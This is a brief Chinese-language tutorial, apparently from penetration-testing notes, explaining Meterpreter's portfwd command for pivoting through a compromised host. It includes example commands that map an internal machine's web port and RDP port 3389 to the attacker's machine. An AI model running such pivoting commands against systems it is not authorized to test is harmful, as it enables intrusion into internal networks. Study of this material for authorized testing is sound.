Meterpreter shell中的portfwd命令最常用作透视技术,允许直接访问攻击系统无法访问的机器, 例如不出网的内网主机, 前提是你要有一个此内网网段的能出网的主机的Meterpreter shell
add: 增加端口转发
add
delete: 删除指定的端口转发
delete
list: 查看端口转发列表
list
flush: 清除所有的端口转发
flush
-L: 监听的本地主机, 默认为127.0.0.1
L
-h: 查看帮助
-h
-l: 监听的本地端口
-l
-p: 连接的目标端口
-p
-r: 连接的目标IP
-r
新增一个端口转发记录, 将本地的8080端口数据转发至内网主机的80端口, 也可以说成将内网主机的80端口映射至msf的8080端口
随后浏览器访问msf主机的8080端口:http://192.168.47.134:8080/
http://192.168.47.134:8080/
使用burpsuite也可以正常抓取到内网主机的web服务数据包
将内网主机的3389端口映射至kali(msf)的2222端口
kali命令行输入:rdesktop 127.0.0.1:2222, 即可远程连接内网主机的桌面服务
rdesktop 127.0.0.1:2222
列出设置的所有端口转发的记录
删除指定端口转发记录
删除所有的端口转发记录
最后更新于1年前
portfwd add -l 8080 -r 192.168.52.148 -p 80
portfwd add -l 2222 -r 192.168.52.148 -p 3389
portfwd list
portfwd delete -l 8080
portfwd flush